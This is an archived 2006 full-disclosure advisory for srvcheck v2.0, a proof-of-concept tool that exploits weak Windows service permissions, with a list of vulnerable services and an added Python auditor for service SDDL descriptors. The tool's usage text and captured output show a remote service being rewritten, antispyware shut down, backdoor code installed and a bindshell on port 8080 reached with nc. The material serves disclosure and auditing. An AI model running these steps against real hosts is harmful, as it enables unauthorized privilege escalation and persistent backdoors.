SECURITYVULNS:DOC:11395
Feb 13, 2006

[Full-disclosure] Privilege Escalation for Windows Networks using weak Service restrictions v2.0 exploit

vulners.com

Proof of concept of Sudhakar Govindavajhala and Andrew Appel's paper (http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf). Running as an unprivileged user, you can test if your services are vulnerable and can be used to install a backdoor. Both source code and binary are included.
Microsoft advisory: http://microsoft.com/technet/security/advisory/914457.mspx

SrvCheck v2.0 is able to perform these checks remotely, using for example domain user credentials.
Here is a short list of known vulnerable services under XP SP2:

  • Advanced User:
    Service: DcomLaunch ( SYSTEM )
    Service: UpnpHost ( Local Service )
    Service: SSDPSRV ( Local Service )
  • User:
    Service: UpnpHost ( Local Service )
    Service: SSDPSRV ( Local Service )
  • Network Config Operators:
    Service: DcomLaunch ( SYSTEM )
    Service: UpnpHost ( Local Service )
    Service: SSDPSRV ( Local Service )
    Service: DHCP ( SYSTEM )
    Service: NetBT ( SYSTEM - .sys driver )
    Service: DnsCache ( SYSTEM )

Windows 2000 Professional SP4:

  • Power User:
    Service: WMI - Windows Management Instrumentation Driver Extensions ( SYSTEM )

Third-party software:

HP: "Pml Driver HPZ12"
Autodesk: "Autodesk Licensing Service" - maybe this one: http://securityfocus.com/bid/16472
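The services above are exploitable because their DACL grants SERVICE_CHANGE_CONFIG (or a right that leads to it) to a group such as Users, Power Users or Network Configuration Operators. As an added audit-side example, not part of this post or of srvcheck, the following checker parses a service security descriptor in the SDDL form that `sc sdshow <service>` prints and flags every allow ACE that hands a write-class right (DC, WD, WO, GA, GW, or the same bits in a numeric mask) to a trustee other than Local System or Builtin Administrators. The sample descriptors are constructed; the weak one mirrors the DHCP finding above by granting change-config to the NO (Network Configuration Operators) alias.

```python
import re

# SDDL rights letters that let a trustee rewrite a service: DC = SERVICE_CHANGE_CONFIG
# (swap the binary path), WD/WO = rewrite the DACL/owner, GA/GW = generic all/write.
WRITE_RIGHTS = {"DC", "WD", "WO", "GA", "GW"}
WRITE_BITS = (("DC", 0x2), ("WD", 0x40000), ("WO", 0x80000),
              ("GA", 0x10000000), ("GW", 0x40000000))   # numeric mask equivalents
PRIVILEGED = {"SY", "BA"}   # Local System, Builtin Administrators: expected to hold these
# ACE string: (type;flags;rights;object_guid;inherit_object_guid;trustee_sid)
ACE_RE = re.compile(r"\((\w+);(\w*);([^;]*);([^;]*);([^;]*);([^;)]+)\)")

# Constructed samples (assumption: shaped like a default XP svchost service descriptor).
SECURE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SDDL = SECURE_SDDL.replace("S:", "(A;;CCDCLCSWRPWPDTLOCRRC;;;NO)S:", 1)


def ace_write_rights(rights):
    """Return the write-class rights present in one SDDL rights field."""
    if rights.lower().startswith("0x"):            # numeric mask form
        mask = int(rights, 16)
        return {name for name, bit in WRITE_BITS if mask & bit}
    pairs = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return pairs & WRITE_RIGHTS


def weak_service_aces(sddl):
    """List (trustee, rights) for allow ACEs giving write-class rights to a
    non-privileged trustee. Rights explicitly denied to the same trustee are
    removed; group nesting and ACE ordering are not modelled (simplification)."""
    dacl = sddl.split("S:", 1)[0]                   # drop the SACL (audit) part
    allowed, denied = {}, {}
    for ace_type, _flags, rights, _ot, _iot, sid in ACE_RE.findall(dacl):
        bucket = {"A": allowed, "D": denied}.get(ace_type)
        if bucket is not None:
            bucket.setdefault(sid, set()).update(ace_write_rights(rights))
    findings = []
    for sid, rights in allowed.items():
        effective = rights - denied.get(sid, set())
        if sid not in PRIVILEGED and effective:
            findings.append((sid, sorted(effective)))
    return findings


if __name__ == "__main__":
    for label, sddl in (("secure", SECURE_SDDL), ("weak", WEAK_SDDL)):
        print(label, weak_service_aces(sddl))
```

Feed it the real output of `sc sdshow <service>` for each service on a host to find the same class of misconfiguration srvcheck reports, without touching the service.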

D:\Programacion\srvcheck2>srvcheck2.exe -?
Services Permissions checker v2.0
(c) 2006 Andres Tarasco - [email protected]

Usage:
-l list vulnerable services
-m <service> modify the configuration for that service
-c <command> Command to execute throw remote service
by default. bindshell application will be used
-H <Host> specify a remote host to connect ip/netbiosname)
-u <user> if not seletected Default logon credentials used)
-p <password> if not used Default logon credentials used)
-? Extended information with samples
examples:
srvcheck.exe -l (list local vulnerabilities)
srvcheck.exe -m service (spawn a shell at port 8080)
srvcheck.exe -m service -c "cmd.exe /c md c:\PWNED"
srvcheck -l -H host (list remote vulnerabilities)

D:\Programacion\srvcheck2>srvcheck2.exe -l -H 192.168.0.1
Services Permissions checker v2.0
(c) 2006 Andres Tarasco - [email protected]

[+] Trying to connect to remote SCM
[+] Host: \\192.168.0.1\IPC$
[+] Username: (null)
[+] Password: (null)
[+] Network Connection OK
[+] Listing Vulnerable Services…

[Dhcp]              Cliente DHCP
Status: 0x4
Parameter:          C:\WINDOWS\System32\svchost.exe -k netsvcs

[Dnscache]          Cliente DNS
Status: 0x4
Parameter:          C:\WINDOWS\System32\svchost.exe -k NetworkService

[NetBT]             NetBios a través de Tcpip
Status: 0x4
Parameter:          System32\DRIVERS\netbt.sys

[SSDPSRV]           Servicio de descubrimientos SSDP
Status: 0x1
Parameter:          C:\WINDOWS\System32\svchost.exe -k LocalService

[upnphost]          Host de dispositivo Plug and Play universal
Status: 0x1
Parameter:          C:&#92;WINDOWS&#92;System32&#92;svchost.exe 

[+] Analyzed 311 Services in your system
[+] You were Lucky. 5 vulnerable services found

D:\Programacion\srvcheck2>srvcheck2.exe -H 192.168.0.1 -m upnphost
Services Permissions checker v2.0
(c) 2006 Andres Tarasco - [email protected]

[+] Trying to connect to remote SCM
[+] Host: \\192.168.0.1\IPC$
[+] Username: (null)
[+] Password: (null)
[+] Network Connection OK
[+] Uninstalling previous backdoors
[+] Granting Remote bindshell Execution…
[+] Shutting down remote antispyware Service =)
[+] Installing Backdoor Code…
[+] The service have been succesfully modified =)
[+] Service Opened. Trying to Start… (wait a few seconds)
[+] StarteService() Error due to a non service application execution
[+] Ignore it. Your application should be executed =)
[+] Now connect to port 8080 and enjoy your new privileges

D:\Programacion\srvcheck2>nc localhost 8080
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

regards,

Andres Tarasco